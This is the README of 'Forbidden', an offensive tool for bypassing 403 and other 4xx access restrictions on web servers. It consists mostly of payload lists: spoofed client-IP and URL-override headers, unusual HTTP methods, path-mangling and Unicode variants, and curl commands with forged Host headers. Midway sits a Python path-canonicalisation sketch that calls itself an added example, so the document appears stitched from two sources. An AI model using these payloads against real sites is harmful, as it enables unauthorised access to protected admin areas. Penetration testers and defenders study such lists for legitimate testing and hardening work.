Forbidden
Bypass 4xx HTTP response status codes.
To see all the test cases, check the source code - follow the NOTE comments.
The script uses multithreading and is based on brute forcing, so it might produce some false positives. The script uses colored output.
Extend this script to your liking.
Tested on Kali Linux v2021.4 (64-bit).
Made for educational purposes. I hope it will help!
Future plans:
- file uploads with HTTP PUT,
- cross-site tracing (XST),
- basic authentication.
How to Run
Open your preferred console from /src/ and run the commands shown below.
Install required packages:
pip3 install -r requirements.txt
Run the script:
python3 forbidden.py
Download a user agent list from here.
Parsed URL Format
To see all the default values used in the script, check the source code - follow the NOTE comments.
{
    "urls": [
        "http://example.com/admin",
        "http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ/ᴬᴰᴹᴵᴺ"
    ],
    "scheme_domains": [
        "http://example.com",
        "http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ"
    ],
    "domains": [
        "example.com",
        "ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ"
    ],
    "paths": [
        "admin",
        "/admin",
        "admin/",
        "/admin/",
        "ᴬᴰᴹᴵᴺ",
        "/ᴬᴰᴹᴵᴺ",
        "ᴬᴰᴹᴵᴺ/",
        "/ᴬᴰᴹᴵᴺ/"
    ],
    "all": [
        "http://example.com/admin",
        "http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ/ᴬᴰᴹᴵᴺ",
        "http://example.com",
        "http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ",
        "example.com",
        "ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ",
        "admin",
        "/admin",
        "admin/",
        "/admin/",
        "ᴬᴰᴹᴵᴺ",
        "/ᴬᴰᴹᴵᴺ",
        "ᴬᴰᴹᴵᴺ/",
        "/ᴬᴰᴹᴵᴺ/"
    ]
}
HTTP Headers
Client-IP
Cluster-Client-IP
Connection
Contact
Forwarded
Forwarded-For
Forwarded-For-Ip
From
Host
Origin
Referer
Stuff
True-Client-IP
X-Client-IP
X-Custom-IP-Authorization
X-Forward
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Server
X-Forward-For
X-Forwared-Host
X-Host
X-HTTP-Host-Override
X-Original-URL
X-Originating-IP
X-Override-URL
X-ProxyUser-IP
X-Real-IP
X-Remote-Addr
X-Remote-IP
X-Rewrite-URL
X-Wap-Profile
X-Server-IP
X-Target
HTTP Methods
ACL
ARBITRARY
BASELINE-CONTROL
BIND
CHECKIN
CHECKOUT
CONNECT
COPY
DELETE
GET
HEAD
INDEX
LABEL
LINK
LOCK
MERGE
MKACTIVITY
MKCALENDAR
MKCOL
MKREDIRECTREF
MKWORKSPACE
MOVE
OPTIONS
ORDERPATCH
PATCH
POST
PRI
PROPFIND
PROPPATCH
PUT
REBIND
REPORT
SEARCH
SHOWMETHOD
SPACEJUMP
TEXTSEARCH
TRACE
TRACK
UNBIND
UNCHECKOUT
UNLINK
UNLOCK
UPDATE
UPDATEREDIRECTREF
VERSION-CONTROL
URL Paths
/
//
/%2e
/%2e/
/.
/./
/..
/../
/;
/;/
/.;
/.;/
/..;
/..;/
%20
%20/
%09
%09/
;foo=bar;
/;foo=bar;
;foo=bar;/
/;foo=bar;/
~
~~
/~randomstring
#
##
/#randomstring
?
??
/?randomstring
/*
/**
/*randomstring
.jsp
.jspa
.jspx
.jhtml
.html
.sht
.shtml
.xhtml
.php
.asp
.aspx
.esp
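An access rule that compares the raw request target misses the path and Unicode variants listed above whenever the backend resolves them to the same resource. The sketch below is an added example, not code from forbidden.py: the protected prefix `/admin`, the function names, and the assumption that the backend percent-decodes, drops path parameters and matches case-insensitively are all illustrative.

```python
import unicodedata
from urllib.parse import unquote

PROTECTED = ("/admin",)   # assumption: the prefix the access rule guards
MAX_DECODE_ROUNDS = 4     # assumption: deeper nesting is rejected outright


def canonical_path(target: str) -> str:
    """Reduce a raw request target to the path a lenient backend may resolve."""
    # Query and fragment never take part in the path match.
    path = target.split("#", 1)[0].split("?", 1)[0]
    # Undo (possibly nested) percent-encoding such as %2e, %20, %09.
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        raise ValueError("too many percent-encoding layers")
    # Fold Unicode compatibility forms and case (ᴬᴰᴹᴵᴺ -> admin).
    path = unicodedata.normalize("NFKC", path).casefold()
    resolved = []
    for segment in path.split("/"):
        # Drop ;path=parameters and stray whitespace from each segment.
        segment = segment.split(";", 1)[0].strip()
        if segment in ("", "."):
            continue          # empty (//) and current-directory segments
        if segment == "..":
            if resolved:
                resolved.pop()
            continue
        resolved.append(segment)
    return "/" + "/".join(resolved)


def is_protected(target: str) -> bool:
    path = canonical_path(target)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)


def naive_is_protected(target: str) -> bool:
    # The weak form: compares the raw target, so every variant below slips by.
    return any(target == p or target.startswith(p + "/") for p in PROTECTED)


# Constructed from this page's own lists, applied to /admin.
VARIANTS = ["//admin", "/%2e/admin", "/;/admin", "/..;/admin", "/admin%20",
            "/admin%09/", "/admin;foo=bar;", "/admin?randomstring", "/ᴬᴰᴹᴵᴺ/"]

if __name__ == "__main__":
    for v in VARIANTS:
        print(f"{v!r:24} naive={naive_is_protected(v)} canonical={is_protected(v)}")
```

Extension suffixes such as `.jsp` or `.html` are not folded here, because whether they reach the same handler depends on the backend's routing; a default-deny rule covers them.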
Results Format
[
    {
        "id": 9,
        "url": "https://example.com/admin",
        "method": "GET",
        "headers": [
            "Host: localhost"
        ],
        "agent": null,
        "command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: localhost' -X 'GET' 'https://example.com/admin'",
        "code": "302",
        "length": "142"
    },
    {
        "id": 49,
        "url": "https://example.com/admin",
        "method": "GET",
        "headers": [
            "Host: localhost:80"
        ],
        "agent": null,
        "command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: localhost:80' -X 'GET' 'https://example.com/admin'",
        "code": "302",
        "length": "142"
    },
    {
        "id": 169,
        "url": "https://example.com/admin",
        "method": "GET",
        "headers": [
            "Host: 127.0.0.1"
        ],
        "agent": null,
        "command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: 127.0.0.1' -X 'GET' 'https://example.com/admin'",
        "code": "302",
        "length": "142"
    },
    {
        "id": 209,
        "url": "https://example.com/admin",
        "method": "GET",
        "headers": [
            "Host: 127.0.0.1:80"
        ],
        "agent": null,
        "command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: 127.0.0.1:80' -X 'GET' 'https://example.com/admin'",
        "code": "302",
        "length": "142"
    }
]
Images
Figure 1 - Help